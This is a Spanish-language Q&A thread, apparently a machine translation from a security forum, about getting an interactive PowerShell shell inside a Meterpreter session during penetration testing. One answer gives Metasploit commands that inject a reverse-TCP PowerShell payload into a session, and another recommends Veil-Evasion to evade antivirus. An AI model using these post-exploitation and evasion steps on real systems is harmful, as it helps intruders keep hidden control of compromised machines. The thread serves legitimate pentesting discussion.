Powershell scripts dentro de las sesiones de meterpreter

1

Tengo interés, traté de responderme sin mucho éxito. Me encantan todos los scripts de powershell proporcionados con fines de explotación posterior - > Powersploit; Nishang etc ... Mi único problema es que no puedo encontrar una manera fácil de usarlos dentro de una sesión de meterpreter.

Corríjame si me equivoco, pero no hay manera de tener una PowerShell "interactiva" desde un shell (meterpreter). No puedo encontrar otra solución que no sea la conversión del script a la codificación Base64 y las funciones de llamada (también codificadas) una a una a través del comando cmd.

Lo que me gustaría hacer (si es posible de alguna manera) es tener un shell interactivo de una sesión ya establecida de meterpreter (a veces esto es un verdadero desafío si consideras que tienes que evadir IDS, AV, arenero, etc).

¿Hay alguna solución para eso?

    
pregunta r4ym0nd PenTester 14.06.2016 - 09:54
fuente

3 respuestas

3

Utilice la Extensión PowerShell de Metepreter . En este caso, su PowerShell se ejecutará en la memoria sin descartar. Si paga, entonces cmdscan o consolas en Volatility o Rekall (o cualquier técnica similar, que utilicen todas las herramientas EDR y DFIR) marcarán el espacio del proceso y entregarán resultados evidentes de compromiso.

    
respondido por el atdre 16.06.2016 - 05:06
fuente
2

Si ya tiene una sesión de meterpreter, póngala en segundo plano con background .

Entonces haz:

use exploit/windows/local/payload_inject
set payload windows/powershell_reverse_tcp
set session <id of session>
set <other options you may need>
run

Luego, tendrá una sesión de Powershell junto al medidor de metro. Todavía no es perfecto (no se completa la pestaña) pero te da salida de comandos.

    
respondido por el Cybergibbons 15.06.2016 - 20:14
fuente
0

puede usar el powershell una vez que obtenga el shell meterpreter. Solo debe interactuar con meterpreter y luego escribir el comando de shell y luego powershell >

Aquí ahora tienes el comando powershell para hacer lo que quieras.

Para evadir el AV para un método fácil, puedes usar la herramienta Veil-Evasion enlace

    
respondido por el Nabin KC 14.06.2016 - 10:51
fuente

Lea otras preguntas en las etiquetas